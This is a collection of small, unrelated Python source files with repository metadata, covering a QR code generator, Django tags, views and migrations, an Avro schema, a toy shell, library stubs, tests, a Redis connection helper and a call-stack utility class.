] | 125 | 2021-10-01T19:05:26.000Z | 2021-10-03T13:32:42.000Z | QRcodegenerator.py | arpitarunkumaar/Hacktoberfest2021 | 0af40f90a6c0716caadbbfff44ece947b6146f60 | [
"MIT"
] | 201 | 2021-10-30T20:40:01.000Z | 2022-03-22T17:26:28.000Z | QRcodegenerator.py | arpitarunkumaar/Hacktoberfest2021 | 0af40f90a6c0716caadbbfff44ece947b6146f60 | [
"MIT"
] | 294 | 2021-10-01T18:46:05.000Z | 2021-10-03T14:25:07.000Z | import pyqrcode
from pyqrcode import QRCode
# String which represent the QR code
s = "https://www.youtube.com/channel/UCeO9hPCfRzqb2yTuAn713Mg"
# Generate QR code
url = pyqrcode.create(s)
# Create and save the png file naming "myqr.png"
url.svg("myyoutube.svg", scale = 8)
| 24 | 62 | 0.725694 | 41 | 288 | 5.097561 | 0.731707 | 0.057416 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025316 | 0.177083 | 288 | 11 | 63 | 26.181818 | 0.85654 | 0.347222 | 0 | 0 | 1 | 0 | 0.377049 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
759e1233cd5221eb7c3d3a4d3d8e9c2c06bf7609 | 234 | py | Python | backend/templatetags/back_tag.py | h1gfun4/h1gfun4.github.io | e460467cb505b525ecd5b01b9eb3fd73de7ec6e1 | [
"MIT"
] | null | null | null | backend/templatetags/back_tag.py | h1gfun4/h1gfun4.github.io | e460467cb505b525ecd5b01b9eb3fd73de7ec6e1 | [
"MIT"
] | null | null | null | backend/templatetags/back_tag.py | h1gfun4/h1gfun4.github.io | e460467cb505b525ecd5b01b9eb3fd73de7ec6e1 | [
"MIT"
] | null | null | null | from django import template
from backend.models import Back
register = template.Library()
@register.inclusion_tag('backend/tags/scrollMenuB.html')
def get_back():
scrollB = Back.objects.all()
return {"scrollMenuB": scrollB } | 26 | 56 | 0.75641 | 29 | 234 | 6.034483 | 0.689655 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128205 | 234 | 9 | 57 | 26 | 0.857843 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 0.123404 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
75c58beec52cc06cb6843a182d38d84b973164ec | 1,358 | py | Python | serializers_test/avro_avg.py | lioritan/Side-Projects | 647bdbf0d3b71ea113739fb7ad2b299aea28c653 | [
"MIT"
] | null | null | null | serializers_test/avro_avg.py | lioritan/Side-Projects | 647bdbf0d3b71ea113739fb7ad2b299aea28c653 | [
"MIT"
] | null | null | null | serializers_test/avro_avg.py | lioritan/Side-Projects | 647bdbf0d3b71ea113739fb7ad2b299aea28c653 | [
"MIT"
] | null | null | null | import avro.schema
import json
import fastavro
SCHEMA = {
"namespace": "avg_obj",
"type": "record",
"name": "Meme",
"fields": [
{"name": "user", "type": {
"type": "record",
"name": "PostUser",
"fields": [
{"name": "user_id", "type": "string"},
{"name": "first_name", "type": ["null", "string"], "default": "null"},
{"name": "last_name", "type": ["null", "string"], "default": "null"},
{"name": "user_type", "type": ["null",
{"type": "enum",
"name": "UserType",
"symbols": ["FREE", "REGULAR", "PREMIUM"]
}], "default": "null"},
]}},
{"name": "title", "type": ["null", "string"], "default": "null"},
{"name": "content", "type": ["null", "bytes"], "default": "null"},
{"name": "top_string", "type": ["null", "string"], "default": "null"},
{"name": "botom_string", "type": ["null", "string"], "default": "null"},
{"name": "likes", "type": ["null", "long"], "default": 0},
{"name": "hates", "type": ["null", "long"], "default": 0},
]
}
avro_schema = fastavro.parse_schema(SCHEMA)
| 38.8 | 89 | 0.401325 | 110 | 1,358 | 4.872727 | 0.336364 | 0.134328 | 0.195896 | 0.195896 | 0.382463 | 0.307836 | 0.253731 | 0 | 0 | 0 | 0 | 0.002307 | 0.361561 | 1,358 | 34 | 90 | 39.941176 | 0.615917 | 0 | 0 | 0.133333 | 0 | 0 | 0.338733 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
75caae991e7575297539a0a5755bf9b4493ee335 | 3,258 | py | Python | pysh.py | tri-llionaire/tri-llionaire.github.io | 5134d3ec0ff1e3b7eab469ea05300b505895212f | [
"MIT"
] | 1 | 2018-04-24T14:53:23.000Z | 2018-04-24T14:53:23.000Z | pysh.py | tri-llionaire/tri-llionaire.github.io | 5134d3ec0ff1e3b7eab469ea05300b505895212f | [
"MIT"
] | null | null | null | pysh.py | tri-llionaire/tri-llionaire.github.io | 5134d3ec0ff1e3b7eab469ea05300b505895212f | [
"MIT"
] | 1 | 2018-08-25T21:15:07.000Z | 2018-08-25T21:15:07.000Z | #pysh: shell in python
import sys
cmdlist = ['start','exit','cd','md','ls','pd','cf','cl']
convert = []
waiting = 0
print 'pysh 1.0.5 19.03.11 #6. type start to enter, exit to leave.'
paths = ['pysh/']
direct = 'pysh/'
added = []
entered = raw_input(': ')
if entered == 'start':
while entered != ['exit']:
entered = raw_input('{} '.format(direct))
entered = entered.split()
for x in entered:
if x in cmdlist:
if waiting == 0:
if x == 'ls':
for i in paths:
if i.startswith(direct) and len(i) > len(direct):
temp = len(direct)
splitted = i[temp:].split('/')
if len(splitted) > 1 and (splitted[0] + '/') not in added:
print splitted[0] + '/'
added.append(splitted[0] + '/')
elif len(splitted) < 2 and splitted[0] not in added:
print splitted[0]
added.append(splitted[0])
else:
pass
else:
pass
elif x == 'pd':
print direct
elif x == 'cd':
waiting = 1
elif x == 'md':
waiting = 2
elif x == 'cf':
waiting = 3
elif x == 'start':
print 'already in pysh'
elif x == 'cl':
sys.stdout.write('\x1b[2J\x1b[H')
else:
break
else:
print 'pysh: consecutive cmd {}'.format(x)
else:
if waiting == 1:
if x == '..':
direct = direct[:-1].rsplit('/',1)[0] + '/'
else:
if direct + x + '/' in paths:
direct = direct + x + '/'
elif x.endswith('/'):
if direct + x in paths:
direct = direct + x
else:
print 'pysh: directory \'{}\' not found'.format(x)
else:
print 'pysh: can\'t cd to file \'{}\''.format(x)
waiting = 0
elif waiting == 2:
if x.endswith('/'):
paths.append(direct + x)
else:
paths.append(direct + x + '/')
waiting = 0
elif waiting == 3:
if x.endswith('/'):
paths.append(direct + x - '/')
else:
paths.append(direct + x)
waiting = 0
else:
print 'pysh: {} not found.'.format(x)
break
else:
print 'startup: {} not found'.format(entered)
| 40.222222 | 90 | 0.329343 | 275 | 3,258 | 3.894545 | 0.258182 | 0.052288 | 0.048553 | 0.067227 | 0.297852 | 0.268908 | 0.268908 | 0.268908 | 0.214753 | 0.214753 | 0 | 0.024322 | 0.558318 | 3,258 | 80 | 91 | 40.725 | 0.719944 | 0.006446 | 0 | 0.303797 | 0 | 0.012658 | 0.082818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.025316 | 0.012658 | null | null | 0.126582 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f9557c2acc79de6411f64feb5d4d5550266b917c | 992 | py | Python | release/stubs.min/System/Diagnostics/__init___parts/EventLogPermissionEntry.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/System/Diagnostics/__init___parts/EventLogPermissionEntry.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/System/Diagnostics/__init___parts/EventLogPermissionEntry.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | class EventLogPermissionEntry(object):
"""
Defines the smallest unit of a code access security permission that is set for an System.Diagnostics.EventLog.
EventLogPermissionEntry(permissionAccess: EventLogPermissionAccess,machineName: str)
"""
@staticmethod
def __new__(self, permissionAccess, machineName):
""" __new__(cls: type,permissionAccess: EventLogPermissionAccess,machineName: str) """
pass
MachineName = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Gets the name of the computer on which to read or write events.
Get: MachineName(self: EventLogPermissionEntry) -> str
"""
PermissionAccess = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Gets the permission access levels used in the permissions request.
Get: PermissionAccess(self: EventLogPermissionEntry) -> EventLogPermissionAccess
"""
| 24.8 | 112 | 0.686492 | 97 | 992 | 6.938144 | 0.536082 | 0.089153 | 0.15156 | 0.160475 | 0.178306 | 0.178306 | 0.178306 | 0.178306 | 0.178306 | 0.178306 | 0 | 0 | 0.228831 | 992 | 39 | 113 | 25.435897 | 0.879739 | 0.279234 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.1 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
f9564d9454e04c5d07bedcb3655d9efe0ca449c7 | 133 | py | Python | compound_types/built_ins/lists.py | vahndi/compound-types | cda4f49651b4bfbcd9fe199de276be472620cfad | [
"MIT"
] | null | null | null | compound_types/built_ins/lists.py | vahndi/compound-types | cda4f49651b4bfbcd9fe199de276be472620cfad | [
"MIT"
] | null | null | null | compound_types/built_ins/lists.py | vahndi/compound-types | cda4f49651b4bfbcd9fe199de276be472620cfad | [
"MIT"
] | null | null | null | from typing import List
BoolList = List[bool]
DictList = List[dict]
FloatList = List[float]
IntList = List[int]
StrList = List[str]
| 16.625 | 23 | 0.736842 | 19 | 133 | 5.157895 | 0.736842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150376 | 133 | 7 | 24 | 19 | 0.867257 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f95b8e23ac103c21bff72619bd1a14be401e08f2 | 161 | py | Python | alexa_skill_boilerplate/__init__.py | variable/alexa_skill_boilerplate | c2c7fc2a3fe8f0bc69ec7559ec9b11f211d76bdc | [
"MIT"
] | null | null | null | alexa_skill_boilerplate/__init__.py | variable/alexa_skill_boilerplate | c2c7fc2a3fe8f0bc69ec7559ec9b11f211d76bdc | [
"MIT"
] | null | null | null | alexa_skill_boilerplate/__init__.py | variable/alexa_skill_boilerplate | c2c7fc2a3fe8f0bc69ec7559ec9b11f211d76bdc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Top-level package for Alexa Skill Boilerplate."""
__author__ = """James Lin"""
__email__ = 'james@lin.net.nz'
__version__ = '0.1.0'
| 20.125 | 52 | 0.639752 | 22 | 161 | 4.136364 | 0.863636 | 0.175824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028986 | 0.142857 | 161 | 7 | 53 | 23 | 0.630435 | 0.428571 | 0 | 0 | 0 | 0 | 0.348837 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f9873b3ec6305739faa020963cb0f6929823dc6d | 799 | py | Python | e/mail-relay/web/apps/core/migrations/0051_customersetting_transfer_max_size.py | zhouli121018/nodejsgm | 0ccbc8acf61badc812f684dd39253d55c99f08eb | [
"MIT"
] | null | null | null | e/mail-relay/web/apps/core/migrations/0051_customersetting_transfer_max_size.py | zhouli121018/nodejsgm | 0ccbc8acf61badc812f684dd39253d55c99f08eb | [
"MIT"
] | 18 | 2020-06-05T18:17:40.000Z | 2022-03-11T23:25:21.000Z | e/mail-relay/web/apps/core/migrations/0051_customersetting_transfer_max_size.py | zhouli121018/nodejsgm | 0ccbc8acf61badc812f684dd39253d55c99f08eb | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0050_customersetting_can_view_mail'),
]
operations = [
migrations.AddField(
model_name='customersetting',
name='transfer_max_size',
field=models.IntegerField(default=0, help_text='\u5355\u4f4d\uff1aM\uff0c\u90ae\u4ef6\u5927\u5c0f\u8d85\u8fc7\u8be5\u9600\u503c\uff0c\u5219\u8be5\u90ae\u4ef6\u53d1\u9001\u65f6\u81ea\u52a8\u8f6c\u7f51\u7edc\u9644\u4ef6, \u9ed8\u8ba4\u503c\uff10, \u8868\u793a\u7528\u7cfb\u7edf\u9ed8\u8ba4\u8bbe\u7f6e\u503c', verbose_name='\u4e2d\u7ee7\uff1a\u81ea\u52a8\u8f6c\u7f51\u7edc\u9644\u4ef6\u6700\u5927\u9600\u503c'),
),
]
| 39.95 | 421 | 0.713392 | 100 | 799 | 5.56 | 0.72 | 0.035971 | 0.053957 | 0.071942 | 0.125899 | 0.125899 | 0.125899 | 0 | 0 | 0 | 0 | 0.212299 | 0.145181 | 799 | 19 | 422 | 42.052632 | 0.601757 | 0.026283 | 0 | 0 | 0 | 0.153846 | 0.529639 | 0.48067 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f98d78abc4c61ae00ffd3cee5b5299a82b124239 | 505 | py | Python | umysqldb/__init__.py | arozumenko/pyumysql | 34b61faf33e2db644b02c483c07ddca32165539a | [
"Apache-2.0"
] | null | null | null | umysqldb/__init__.py | arozumenko/pyumysql | 34b61faf33e2db644b02c483c07ddca32165539a | [
"Apache-2.0"
] | null | null | null | umysqldb/__init__.py | arozumenko/pyumysql | 34b61faf33e2db644b02c483c07ddca32165539a | [
"Apache-2.0"
] | null | null | null | from umysqldb import connections
from umysqldb import cursors
def connect(db, host="localhost", port=3306, user="root", passwd="root",
charset="utf8", cursorclass=cursors.Cursor, autocommit=False):
return connections.Connection(database=db, host=host, port=port, user=user,
passwd=passwd, charset=charset,
cursorclass=cursorclass,
autocommit=autocommit)
Connection = Connect = connect | 42.083333 | 79 | 0.609901 | 48 | 505 | 6.416667 | 0.5 | 0.077922 | 0.116883 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014124 | 0.29901 | 505 | 12 | 80 | 42.083333 | 0.855932 | 0 | 0 | 0 | 0 | 0 | 0.041502 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0.222222 | 0.222222 | 0.111111 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 2 |
f9a2fdd3c94e96ddac9d38ba04e226d5f50ff29b | 452 | py | Python | docker/dev_app/views.py | uw-it-aca/uw-django-saml2 | 04cd99c0f8fff6160c13e3aa0e44324f6a4079fe | [
"Apache-2.0"
] | 2 | 2018-04-20T19:02:11.000Z | 2020-01-21T07:08:48.000Z | docker/dev_app/views.py | uw-it-aca/uw-django-saml2 | 04cd99c0f8fff6160c13e3aa0e44324f6a4079fe | [
"Apache-2.0"
] | 71 | 2018-03-27T17:52:31.000Z | 2022-02-18T23:09:05.000Z | docker/dev_app/views.py | uw-it-aca/uw-django-saml2 | 04cd99c0f8fff6160c13e3aa0e44324f6a4079fe | [
"Apache-2.0"
] | 1 | 2018-12-04T19:20:36.000Z | 2018-12-04T19:20:36.000Z | from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse
from uw_saml.utils import is_member_of_group
# Create your views here.
@login_required
def index(request):
if is_member_of_group(request, settings.UW_SAML_PERMISSIONS['perm2']):
return HttpResponse("Hello, world. You have perm2.")
else:
return HttpResponse("Hello, world. You don't have perm2.")
| 28.25 | 74 | 0.765487 | 64 | 452 | 5.234375 | 0.578125 | 0.089552 | 0.059701 | 0.089552 | 0.185075 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007833 | 0.152655 | 452 | 15 | 75 | 30.133333 | 0.866841 | 0.050885 | 0 | 0 | 0 | 0 | 0.161593 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.4 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
f9ade94d5d26429d7edd4cdfcee8f28919e4bd4f | 597 | py | Python | ror/NoTieResolver.py | jakub-tomczak/ror | cf9ab38a2d66f4816a1289b9726911960059fce7 | [
"MIT"
] | null | null | null | ror/NoTieResolver.py | jakub-tomczak/ror | cf9ab38a2d66f4816a1289b9726911960059fce7 | [
"MIT"
] | null | null | null | ror/NoTieResolver.py | jakub-tomczak/ror | cf9ab38a2d66f4816a1289b9726911960059fce7 | [
"MIT"
] | null | null | null | from ror.RORParameters import RORParameters
from ror.RORResult import RORResult
from ror.AbstractTieResolver import AbstractTieResolver
from ror.result_aggregator_utils import Rank
class NoTieResolver(AbstractTieResolver):
def __init__(self) -> None:
super().__init__('NoResolver')
def resolve_rank(self, rank: Rank, result: RORResult, parameters: RORParameters) -> Rank:
super().resolve_rank(rank, result, parameters)
return rank
def help(self) -> str:
return 'This resolver does nothing. It just returns same rank as was provided as an input.' | 37.3125 | 99 | 0.740369 | 71 | 597 | 6.056338 | 0.507042 | 0.065116 | 0.065116 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.18258 | 597 | 16 | 99 | 37.3125 | 0.881148 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.333333 | 0.083333 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
f9b1deee9145e20a82bd34752d2e98a230a5a620 | 568 | py | Python | src/database/migrations/0027_auto_20190829_1530.py | gregory-chekler/api | 11ecbea945e7eb6fa677a0c0bb32bda51ba15f28 | [
"MIT"
] | 2 | 2020-07-24T12:58:17.000Z | 2020-12-17T02:26:13.000Z | src/database/migrations/0027_auto_20190829_1530.py | gregory-chekler/api | 11ecbea945e7eb6fa677a0c0bb32bda51ba15f28 | [
"MIT"
] | 214 | 2019-06-26T17:33:54.000Z | 2022-03-26T00:02:34.000Z | src/database/migrations/0027_auto_20190829_1530.py | massenergize/portalBackEnd | 7ed971b2be13901667a216d8c8a46f0bed6d6ccd | [
"MIT"
] | 6 | 2020-03-13T20:29:06.000Z | 2021-08-20T16:15:08.000Z | # Generated by Django 2.2.3 on 2019-08-29 15:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('database', '0026_auto_20190829_1528'),
]
operations = [
migrations.AddField(
model_name='vendor',
name='email',
field=models.EmailField(blank=True, max_length=100),
),
migrations.AddField(
model_name='vendor',
name='phone_number',
field=models.CharField(blank=True, max_length=100),
),
]
| 23.666667 | 64 | 0.584507 | 60 | 568 | 5.4 | 0.666667 | 0.111111 | 0.141975 | 0.166667 | 0.358025 | 0.228395 | 0 | 0 | 0 | 0 | 0 | 0.092965 | 0.299296 | 568 | 23 | 65 | 24.695652 | 0.721106 | 0.079225 | 0 | 0.352941 | 1 | 0 | 0.115163 | 0.044146 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f9b5c8efc58630f49b1fe78511366116237e9554 | 471 | py | Python | tests/conditions/operators/test_set_membership_operator.py | rusintez/flipper-client | cd00ae1a3582c5cb7e661c5aa9b8a7b65b35a9e0 | [
"Apache-2.0"
] | 82 | 2019-04-03T16:09:04.000Z | 2022-03-29T23:48:31.000Z | tests/conditions/operators/test_set_membership_operator.py | rusintez/flipper-client | cd00ae1a3582c5cb7e661c5aa9b8a7b65b35a9e0 | [
"Apache-2.0"
] | 17 | 2019-04-16T17:17:36.000Z | 2021-02-25T22:06:01.000Z | tests/conditions/operators/test_set_membership_operator.py | rusintez/flipper-client | cd00ae1a3582c5cb7e661c5aa9b8a7b65b35a9e0 | [
"Apache-2.0"
] | 12 | 2019-07-29T20:07:28.000Z | 2022-03-29T21:10:15.000Z | import unittest
from flipper.conditions.operators.set_membership_operator import SetMembershipOperator
class TestCompare(unittest.TestCase):
def test_returns_true_when_expected_is_in_actual(self):
operator = SetMembershipOperator()
self.assertTrue(operator.compare(1, [1, 2, 3]))
def test_returns_false_when_expected_is_not_in_actual(self):
operator = SetMembershipOperator()
self.assertFalse(operator.compare(1, [2, 3, 4]))
| 29.4375 | 86 | 0.760085 | 56 | 471 | 6.089286 | 0.571429 | 0.041056 | 0.082111 | 0.117302 | 0.26393 | 0.26393 | 0 | 0 | 0 | 0 | 0 | 0.02005 | 0.152866 | 471 | 15 | 87 | 31.4 | 0.834586 | 0 | 0 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 1 | 0.222222 | false | 0 | 0.222222 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f9b8816aef7a829b307e2a9d13b933fbcd80a3a1 | 353 | py | Python | tests/utils/test_gzipgen.py | takanabe/cli | 7cbf781d7f286fc4e52ef0980712c28f386e8d09 | [
"Apache-2.0"
] | 19 | 2021-01-07T06:41:51.000Z | 2022-03-05T08:23:57.000Z | tests/utils/test_gzipgen.py | takanabe/cli | 7cbf781d7f286fc4e52ef0980712c28f386e8d09 | [
"Apache-2.0"
] | 189 | 2020-11-04T15:38:47.000Z | 2022-03-31T05:02:06.000Z | tests/utils/test_gzipgen.py | takanabe/cli | 7cbf781d7f286fc4e52ef0980712c28f386e8d09 | [
"Apache-2.0"
] | 7 | 2020-11-20T16:55:51.000Z | 2022-02-01T11:17:30.000Z | from launchable.utils.gzipgen import compress
import gzip
from unittest import TestCase
class GzippenTest(TestCase):
def test_compress(self):
"""Basic sanity test of """
encoded = b''.join(compress([b'Hello', b' ', b'world']))
msg = gzip.decompress(encoded)
print(msg)
self.assertEqual(msg, b'Hello world')
| 27.153846 | 64 | 0.654391 | 44 | 353 | 5.227273 | 0.590909 | 0.052174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.220963 | 353 | 12 | 65 | 29.416667 | 0.836364 | 0.056657 | 0 | 0 | 0 | 0 | 0.067485 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 1 | 0.111111 | false | 0 | 0.333333 | 0 | 0.555556 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
f9e18afe3ddb7b565b697f03187cc311b80b604e | 670 | py | Python | dallinger/redis_utils.py | Dallinger/Dallinger | c3acf1375391ef8cb702641638bf5a5008aa9be3 | [
"MIT"
] | 100 | 2016-09-07T03:55:36.000Z | 2022-02-28T02:20:10.000Z | dallinger/redis_utils.py | Dallinger/Dallinger | c3acf1375391ef8cb702641638bf5a5008aa9be3 | [
"MIT"
] | 3,457 | 2016-09-05T23:21:31.000Z | 2022-03-31T19:11:31.000Z | dallinger/redis_utils.py | Dallinger/Dallinger | c3acf1375391ef8cb702641638bf5a5008aa9be3 | [
"MIT"
] | 53 | 2016-10-03T07:24:34.000Z | 2021-10-20T20:42:38.000Z | import os
import redis
from urllib.parse import urlparse
def connect_to_redis(url=None):
"""Return a connection to Redis.
If a URL is supplied, it will be used, otherwise an environment variable
is checked before falling back to a default.
Since we are generally running on Heroku, and configuring SSL certificates
is challenging, we disable cert requirements on secure connections.
"""
redis_url = url or os.getenv("REDIS_URL", "redis://localhost:6379")
connection_args = {"url": redis_url}
if urlparse(redis_url).scheme == "rediss":
connection_args["ssl_cert_reqs"] = None
return redis.from_url(**connection_args)
| 30.454545 | 78 | 0.723881 | 95 | 670 | 4.978947 | 0.589474 | 0.084567 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007407 | 0.19403 | 670 | 21 | 79 | 31.904762 | 0.868519 | 0.435821 | 0 | 0 | 0 | 0 | 0.150997 | 0.062678 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.333333 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
ddabee57641e5f2212bdb1af4233c76d2dc9db3e | 2,238 | py | Python | introspection/call_stack.py | Aran-Fey/introspection | 0ce3a16688b51bdcb72c7b070d571a1004f5151b | [
"MIT"
] | 1 | 2022-03-02T23:13:06.000Z | 2022-03-02T23:13:06.000Z | introspection/call_stack.py | Aran-Fey/introspection | 0ce3a16688b51bdcb72c7b070d571a1004f5151b | [
"MIT"
] | null | null | null | introspection/call_stack.py | Aran-Fey/introspection | 0ce3a16688b51bdcb72c7b070d571a1004f5151b | [
"MIT"
] | null | null | null |
import types
from typing import Iterable, Union
from .call_frame import CallFrame
__all__ = ['CallStack']
class CallStack:
"""
Represents the call stack - a series of :class:`CallFrame` instances.
This class can be used like a read-only list. It supports iteration, indexing, membership testing, etc. The root frame is first in the list, at index 0.
Because holding references to call frames can result in reference cycles,
it's recommended to use CallStack objects as context managers. Upon exit,
the frame objects are released and the CallStack becomes empty::
with CallStack.current() as stack:
... # do something with the stack
# at this point, len(stack) is 0
"""
__slots__ = ('__frames',)
def __init__(self, frames: Iterable[Union[CallFrame, types.FrameType]]):
"""
Creates a new ``CallStack`` from the given frame objects.
:param frames: An iterable of frame objects, starting with the root frame
"""
self.__frames = [CallFrame.from_frame(frame) for frame in frames]
@classmethod
def current(cls) -> 'CallStack':
"""
Get the current call stack.
"""
with CallFrame.current() as frame:
return cls.from_frame(frame.parent)
@classmethod
def from_frame(cls, frame) -> 'CallStack':
"""
Creates a ``CallStack`` containing ``frame`` and all its parents.
:param frame: The last frame in the call stack
